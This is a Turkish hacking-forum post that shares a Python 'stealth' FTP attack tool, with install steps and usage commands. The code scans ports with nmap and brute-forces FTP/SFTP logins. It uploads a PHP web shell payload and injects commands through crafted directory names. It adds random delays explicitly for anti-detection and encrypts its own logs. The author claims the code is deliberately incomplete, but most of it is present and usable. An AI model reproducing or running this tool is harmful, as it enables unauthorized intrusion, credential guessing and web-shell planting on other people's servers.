Merhaba değerli TurkHackTeam üyeleri, başlıktaki gibi konuya geçelim.

İlk önce gerekli kütüphaneleri indirelim.
Kurulumdan sonra
Şimdi gelelim bazı komutlara
Komut yükleme: python stealth_ftp.py -s ftp.example.com --inject "id"
otomatik payload: python stealth_ftp.py -s ftp.example.com --auto-payload linux
NOT: Kötüye kullanılmasın diye kodu tam olarak yazmadım.

İlk önce gerekli kütüphaneleri indirelim.
Kod:
pip install cryptography paramiko aiohttp python-nmap
sudo apt install nmap
Kurulumdan sonra
Python:
import asyncio
import ssl
import ftplib
import paramiko
import socket
import subprocess
import os
import sys
import logging
from typing import Optional, List, Tuple
from datetime import datetime
from cryptography.fernet import Fernet
from aiohttp import ClientSession
from random import randint
import base64
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
key = Fernet.generate_key()
cipher = Fernet(key)
class StealthFTPTester:
def __init__(self, server: str, port: int = 21, protocol: str = "ftp", use_proxy: bool = False):
self.server = server
self.port = port
self.protocol = protocol.lower()
self.use_proxy = use_proxy
self.username = "anonymous"
self.password = ""
self.connected = False
self.session: Optional[ClientSession] = None
self.ftp = None
self.ftps = None
self.ssh = None
self.sftp = None
self.log_file = f"ftp_{datetime.now().strftime('%Y%m%d_%H%M%S')}.enc"
async def _encrypt_log(self, msg: str):
with open(self.log_file, 'ab') as f:
f.write(cipher.encrypt(msg.encode()))
print(f"[*] {msg}")
async def _proxy_connect(self):
if self.use_proxy:
self.session = ClientSession()
await self._encrypt_log("Proxy bağlantısı aktif")
async def network_scan(self) -> List[Tuple[str, int]]:
try:
result = subprocess.check_output(['nmap', '-p', '20,21,22', self.server], text=True)
ports = [(self.server, int(line.split('/')[0])) for line in result.splitlines() if "open" in line and any(p in line for p in ["20/tcp", "21/tcp", "22/tcp"])]
await self._encrypt_log(f"Tarama sonucu: {ports}")
return ports
except Exception as e:
await self._encrypt_log(f"Tarama hatası: {e}")
return [(self.server, self.port)]
async def connect(self, username: str = "anonymous", password: str = "") -> bool:
self.username, self.password = username, password
await asyncio.sleep(randint(1, 3)) # Anti-tespit için rastgele gecikme
try:
if self.protocol == "ftp":
self.ftp = ftplib.FTP()
self.ftp.connect(self.server, self.port)
self.ftp.login(username, password)
elif self.protocol == "ftps":
self.ftps = ftplib.FTP_TLS(context=ssl.create_default_context())
self.ftps.connect(self.server, self.port)
self.ftps.login(username, password)
self.ftps.prot_p()
elif self.protocol == "sftp":
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(self.server, port=self.port, username=username, password=password)
self.sftp = self.ssh.open_sftp()
self.connected = True
await self._encrypt_log(f"Bağlantı: {self.server}:{self.port} | {self.protocol}")
return True
except Exception as e:
await self._encrypt_log(f"Bağlantı hatası: {e}")
return False
async def vuln_check(self):
checks = []
if await self.connect("anonymous", ""):
checks.append("Anonymous login")
if self.protocol in ["ftp", "ftps"] and self.port != 21:
checks.append("Non-standard port")
await self._encrypt_log(f"Açıklar: {checks}")
print(f"[VULN] {checks}")
return checks
async def brute_force(self, usernames: List[str], passwords: List[str]) -> Optional[Tuple[str, str]]:
async def try_login(user: str, pwd: str) -> Optional[Tuple[str, str]]:
if await self.connect(user, pwd):
return user, pwd
return None
tasks = [try_login(u, p) for u in usernames for p in passwords]
results = await asyncio.gather(*tasks)
for res in results:
if res:
self.username, self.password = res
await self._encrypt_log(f"Başarılı: {res[0]}:{res[1]}")
return res
await self._encrypt_log("Brute-force başarısız")
return None
async def generate_payload(self, target_type: str = "generic") -> Tuple[str, bytes]:
payloads = {
"generic": b"<?php system($_GET['cmd']); ?>",
"linux": b"#!/bin/bash\necho $USER",
"windows": b"@echo %USERNAME%"
}
payload = payloads.get(target_type, payloads["generic"])
remote_file = f"payload_{randint(1000, 9999)}.{target_type}"
await self._encrypt_log(f"Payload oluşturuldu: {remote_file}")
return remote_file, payload
async def upload_payload(self, local_file: Optional[str] = None, remote_file: Optional[str] = None, target_type: str = "generic"):
if not self.connected:
await self.connect(self.username, self.password)
if not local_file:
remote_file, payload = await self.generate_payload(target_type)
local_file = f"/tmp/{remote_file}"
with open(local_file, 'wb') as f:
f.write(payload)
try:
with open(local_file, 'rb') as f:
if self.protocol in ["ftp", "ftps"]:
(self.ftp if self.protocol == "ftp" else self.ftps).storbinary(f'STOR {remote_file}', f)
elif self.protocol == "sftp":
self.sftp.put(local_file, remote_file)
await self._encrypt_log(f"Yükleme: {remote_file}")
print(f"[+] Yüklendi: {remote_file}")
except Exception as e:
await self._encrypt_log(f"Yükleme hatası: {e}")
async def inject_command(self, command: str):
if not self.connected:
await self.connect(self.username, self.password)
payload = f"test;{command};.txt"
try:
if self.protocol in ["ftp", "ftps"]:
(self.ftp if self.protocol == "ftp" else self.ftps).mkd(payload)
elif self.protocol == "sftp":
_, stdout, _ = self.ssh.exec_command(command)
result = stdout.read().decode()
await self._encrypt_log(f"SFTP komut sonucu: {result}")
print(f"[+] Sonuç: {result}")
await self._encrypt_log(f"Enjeksiyon: {payload}")
print(f"[+] Denendi: {payload}")
except Exception as e:
await self._encrypt_log(f"Enjeksiyon hatası: {e}")
async def close(self):
if self.protocol in ["ftp", "ftps"]:
(self.ftp or self.ftps).quit()
elif self.protocol == "sftp":
self.sftp.close()
self.ssh.close()
if self.session:
await self.session.close()
self.connected = False
await self._encrypt_log("Kapatıldı")
async def main(args):
tester = StealthFTPTester(args.server, args.port, args.protocol, args.proxy)
await tester._proxy_connect()
if args.scan:
targets = await tester.network_scan()
tasks = [StealthFTPTester(t[0], t[1], args.protocol, args.proxy).connect() for t in targets]
await asyncio.gather(*tasks)
if args.vuln:
await tester.vuln_check()
if args.brute:
with open(args.brute[0], 'r') as uf, open(args.brute[1], 'r') as pf:
usernames = [line.strip() for line in uf]
passwords = [line.strip() for line in pf]
await tester.brute_force(usernames, passwords)
if not tester.connected and not args.brute:
await tester.connect()
if args.inject:
await tester.inject_command(args.inject)
if args.upload:
await tester.upload_payload(args.upload[0], args.upload[1])
elif args.auto_payload:
await tester.upload_payload(target_type=args.auto_payload)
await tester.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Stealth FTP Tester')
parser.add_argument('-s', '--server', required=True)
parser.add_argument('-p', '--port', type=int, default=21)
parser.add_argument('--protocol', choices=['ftp', 'ftps', 'sftp'], default='ftp')
parser.add_argument('--proxy', action='store_true')
parser.add_argument('--scan', action='store_true')
parser.add_argument('--vuln', action='store_true')
parser.add_argument('--brute', nargs=2, metavar=('users', 'passwords'))
parser.add_argument('--inject', type=str)
parser.add_argument('--upload', nargs=2, metavar=('local', 'remote'))
parser.add_argument('--auto-payload', choices=['generic', 'linux', 'windows'], help='Otomatik payload')
args = parser.parse_args()
asyncio.run(main(args))
Şimdi gelelim bazı komutlara
Komut yükleme: python stealth_ftp.py -s ftp.example.com --inject "id"
otomatik payload: python stealth_ftp.py -s ftp.example.com --auto-payload linux
NOT: Kötüye kullanılmasın diye kodu tam olarak yazmadım.



